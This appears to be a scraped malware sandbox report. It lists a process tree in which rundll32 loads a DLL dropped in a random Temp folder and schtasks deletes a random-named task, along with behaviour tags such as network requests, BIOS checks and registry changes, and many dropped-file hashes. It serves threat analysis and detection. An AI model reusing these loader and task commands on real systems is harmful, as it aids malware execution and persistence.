C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\prcciRLxuAmrJUJV\XdcljFhG\eQfPJEp.dll",#1 /eFsite_idWJj 5254031⤵PID:1480
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\prcciRLxuAmrJUJV\XdcljFhG\eQfPJEp.dll",#1 /eFsite_idWJj 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1224 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UlrsxbhsbQOtZaLyo"3⤵PID:1056
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD521e185cbd7b67e1b1598a114253f0ddf
SHA1ba564c4d48e2ae10059d9f861dc7343acb309241
SHA25639083b62898b487fda48913cc98a41ab1d90cfd86b7d807660938af09abbda0f
SHA512c22837467f092f00478a8794c53363aac8e62388d695da838860b1ced7a7c925cfee2c5c6a16bcdec4cb0c28eecd81c1366739f0e53193fc0edbd60b25f6d668
-
Filesize
2KB
MD55b0e657b00dd70422e83002268609979
SHA1ef4aa166ca70c9934a4a6fca7864018b834f357e
SHA256e663c008cb5f4d7a8a95ac28b85803beb2698cf7dae19c9885266d8fde73cecf
SHA512321a2d0c39034e51736dfdf4734b4cc70a8ff3d0bf22098a89df8b5c0abfe6797140501ff0b03e53a4ffb6c431eaf73922aa41db74cb7a14dd497a223251cb00
-
Filesize
2KB
MD531f5066a50dbcbe0436517771283ae6d
SHA1c3da8cd8b38de5f4c102ecbdfaa29d0032014ec6
SHA256f3fcd95f80c454d16f4512374bf50d6b726949f4394586d43e89a25df79c483b
SHA5125452e22febe724eee9c0e35cb267e5d99e50125fbaa1f4712905abf48855f1239556c4d11082f16c4167f5a92877d52691d0ce9972a7a1437fce39a8388d5fb1
-
Filesize
2KB
MD50e9974469f96c2f263b3aecc30fc03f4
SHA187999af8dfdb46e41667b2f7e3dacfbe2e1e104c
SHA256d3ae3e39f5d31988d4a627a510821e8686a63aca071fabe213524148ea11489e
SHA512ae843371e01abd90b3a0f3590c0513f777f642db0e601d12e64323d935d2c8b8bd83020d65b9913fc5b760485bc567c5097b79e6af60b90cab9a1e36e17f96a1
-
Filesize
1.4MB
MD5adcef2834a5577af1e43aa42a37304ec
SHA1de7212240629b83c43273b7a1c1edefef2ab4ec9
SHA256138506b3c2a66276226a43c926910f1e5e982ed4173df9322564a632b39a7ecf
SHA51247ae30abb6f89ad7f8adabb21d7b90f8dc7410f8b9c24ba432f037b15f736194b8808a66287377fec931cafbc222e902a6ec68caa121e0efb27ee3cc1633232f
-
Filesize
2KB
MD5833938c455048003f76fc7261afa9b9b
SHA127651f0cc184fad4ffb1c671fdfcd936653f3795
SHA2569b70ce362eb68e77b01b3f944d872c7b906f288dd91a0006ad69a9fe342a4aea
SHA512d25de3fd96a473a4a6de72bde79344fe2d81ce615c331329d851b562f0215360ca6044b121603add0d440f72b865712e7a71a49e355ba268821c111374c74adc
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5e4e18631c1db53979737cfac81e92941
SHA10b252fcea6c6f19bdc43cd26dc7c82715dfa31c0
SHA256197a2a2029dc038139e2ce8e4aa5880a05c08d6d6d46af4ddad3d60bea864e44
SHA5123d322ec4c195c85c43d4a4bccfc6b77c31468b2959b5eeebbe4f69d01135a33a0cb665a6a6268e377b7e1981e9e3c9384157bddd1f4f7a49c728ed2a10453bfe
-
Filesize
36KB
MD54acb42b1e7fd1e56063985a75187decb
SHA1a1c9d00b31fa40fc190227d907b9fd0938f7f7e3
SHA2561affc6df553604b5484ebc3144f33c7932f47b6711493507d15d407ad8994084
SHA512b7efcc172abfa9ce74c7cb7e55bf5200ceb60a49fd5deb388c18b20ea38f4a313dcf99b04d39f6862b2439f9d555df52f74d2b0c4ad4618e143d7fc28e4d047a
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5cb1c23abe845e7d68dd3ae21c2237c47
SHA1d176aeadf56fdd10ec0f43dd326fa14ed9fbc5c0
SHA256f5d432de30811e1b832f470c12632808f0f5de16fc5e1534dae5bede70a9af91
SHA512524ac6c8cd57654568b0d045eb553e813fdb68ac02f682dc8e41f4aa6c8b4b62046b1afc0c41578bebb89205cdf0ace348bd0c3a7830595e8ea8b869f0117b33
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.1MB
MD576dfc4d1df519e5104fd2c88f8d649d0
SHA1058fff59067d597adeec56c90289e35a20c41b46
SHA256f4a0b769eeab76035d12f912d0dffa83bf3bcde126d41012a252e4c5ec4fdc50
SHA51293b5e3b90f5b566da9ab7d4456231c73fc095d27a14e81e12e3ab18a951d29d1dcf750a4fb7d8c9ebfa6aad730e30bad48074fe4fdd3f6fba5039968e0cf3fa1
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5a237adbb2b947365ab4379d88f6d7421
SHA11fce052cf5592e15a263bd63fe38c05635a490cf
SHA256b601e6dd57eb4615277cf35decc8b205790b8ec982f6872d37b2428f1f9300db
SHA512c833903344ee546aaccce7abd79b348dcafff73e590b2eb30c5b743af7cbf6dce8a5b1abc5f24d3aedbe6cb01d1ea861f7172109eebeb24c3100d21704da8c09
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5a60ce27820907184395da01e7a1863a6
SHA12d8fb017994b571bf4b988b616a836b129036930
SHA2569f6a78003bb80864c9ea3f5c6e34619a6264f0b6266ca18364770caf4fb48457
SHA5122592c2a10a8dfefaec962f35387213cbc381d0eaeea858690c4133a94debe575ba432806c36cfcb4c67110a9d20145a95a72ab6bdcca8424a9bb1ad3119259b9
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.7MB
MD53c56cd03a3e148e3e9d74e8442b3c8a0
SHA14af4b2e98100aafb5d628051d28ef044d23d07be
SHA256b32cd96c0c124cc5b81bf1c82f7e3028480c4742c8ce1cb63a51e6912407eb7a
SHA5125e5f7edba22eb3b679010cfcc78a556079ab873d251462150b689aa81ef5e6f8428a641866eddd59079072dde02d64607a93978e498cf7f86c5a45a18f62498d
-
Filesize
6.1MB
MD5b8867147a5d4d07d25c8092f0160876b
SHA1c1bd128ea72baed013b139492ad876b7cd84f3fc
SHA2565a5ba3a5fe3bc0e60d416a9757b1162f1a9d26d8fc6408503ad87de4e6ddead5
SHA512391afb3900a2ce3a16f917076ffefe18eacb526c55dbc2da44d5daf8fc015e4fd2059cea03d44bc4da2ac185c4051f70bc3ee13a63b6b9ee4c344e66ec2d2a4a
-
Filesize
6.1MB
MD5b8867147a5d4d07d25c8092f0160876b
SHA1c1bd128ea72baed013b139492ad876b7cd84f3fc
SHA2565a5ba3a5fe3bc0e60d416a9757b1162f1a9d26d8fc6408503ad87de4e6ddead5
SHA512391afb3900a2ce3a16f917076ffefe18eacb526c55dbc2da44d5daf8fc015e4fd2059cea03d44bc4da2ac185c4051f70bc3ee13a63b6b9ee4c344e66ec2d2a4a
-
Filesize
6KB
MD5db40587737df74d247fdcbec48853edf
SHA17a7e2bfcb097a3a5cb785d611cc882f647cb3acf
SHA2561054cf18f02b52e5f4ab4fa8a7eaa03104c4141e0b008e3b37fdf0eb0d033e45
SHA5127d3250996cb002302ac1fc1ccf10fba98fe24e176d960ae1b7f1ba0c277c721b26b46c4c18df985dad087b581027f4f536063bdbf73a361a6a7b8844be88050e
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732